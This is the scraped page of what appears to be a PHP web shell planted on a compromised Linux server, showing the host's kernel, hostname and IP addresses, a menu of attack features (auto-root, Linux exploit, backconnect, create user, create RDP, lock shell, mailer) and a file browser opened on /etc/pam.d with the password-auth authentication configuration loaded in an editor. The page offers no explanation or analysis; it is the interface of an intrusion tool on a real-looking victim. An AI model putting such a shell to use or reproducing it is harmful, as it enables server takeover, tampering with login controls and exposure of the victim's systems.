Linux server.bornosky.com 4.18.0-477.13.1.lve.el8.x86_64 #1 SMP Thu Jun 1 16:40:47 EDT 2023 x86_64
Apache
: 95.217.200.235 | : 3.144.251.106
Cant Read [ /etc/named.conf ]
7.3.33
aggscedu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
pam.d /
[ HOME SHELL ]
Name
Size
Permission
Action
chfn
342
B
-rw-r--r--
chsh
342
B
-rw-r--r--
config-util
232
B
-rw-r--r--
fingerprint-auth
701
B
-rw-r--r--
login
715
B
-rw-r--r--
other
154
B
-rw-r--r--
password-auth
786
B
-rw-r--r--
postlogin
398
B
-rw-r--r--
remote
640
B
-rw-r--r--
runuser
143
B
-rw-r--r--
runuser-l
138
B
-rw-r--r--
smartcard-auth
743
B
-rw-r--r--
su
657
B
-rw-r--r--
su-l
137
B
-rw-r--r--
system-auth
786
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : password-auth
#%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authselect is run. auth required pam_env.so auth required pam_hulk.so auth sufficient pam_unix.so try_first_pass nullok auth required pam_deny.so account required pam_unix.so password requisite pam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= password sufficient pam_unix.so try_first_pass use_authtok nullok sha512 shadow password required pam_deny.so session optional pam_keyinit.so revoke session required pam_limits.so -session optional pam_systemd.so session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid session required pam_unix.so
Close